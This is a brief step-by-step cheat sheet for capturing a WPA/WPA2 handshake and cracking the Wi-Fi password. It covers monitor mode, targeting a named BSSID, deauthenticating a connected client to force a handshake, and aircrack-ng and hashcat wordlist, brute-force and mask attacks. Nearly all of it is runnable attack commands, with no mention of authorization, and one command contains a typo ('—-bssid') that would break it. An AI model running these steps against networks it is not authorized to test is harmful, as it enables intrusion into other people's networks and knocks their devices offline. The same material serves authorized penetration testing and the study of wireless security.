STEP 1 - Get Handshake

Check if your wireless card does support monitor mode.
If you do not see an interface listed then your wireless card does not support monitor mode.


Put your network device into monitor mode

# airmon-ng start wlan0

Listen for all nearby beacon frames to get target BSSID and channel

# airodump-ng wlan0mon

Start listening for the handshake

# airodump-ng --channel 6 —-bssid 9C:5C:8E:C9:AB:C0 --write capture/ wlan0mon

Optionally deauth a connected client to force a handshake
-a = AP, -c = Client

# aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 wlan0mon

STEP 2 - Crack password with aircrack-ng / hashcat

Convert .cap to .hccapx

# aircrack-ng -j OUT.hccapx IN.cap


# aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w wordlist.txt capture/-01.cap

hashcat (wordlist)

# hashcat -m 2500 capture.hccapx wordlist.txt

hashcat (brutal-force)

# hashcat -m 2500 capture.hccapx -a 3

hashcat (brutal-force if you know the length of password)

The following command is and example of how your scenario would work with a password of length = 8.

# hashcat -m 2500 -a 3 capture.hccapx ?d?d?d?d?d?d?d?d

The -a 3 denotes the “mask attack” (which is bruteforce but more optimized).

The -m 2500 denotes the type of password used in WPA/WPA2.

The capture.hccapx is the .hccapx file you already captured.

The ?d?d?d?d?d?d?d?d denotes a string composed of 8 digits.

If you want to specify other charsets, these are the following supported by hashcat:

?l = abcdefghijklmnopqrstuvwxyz
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 – 0xff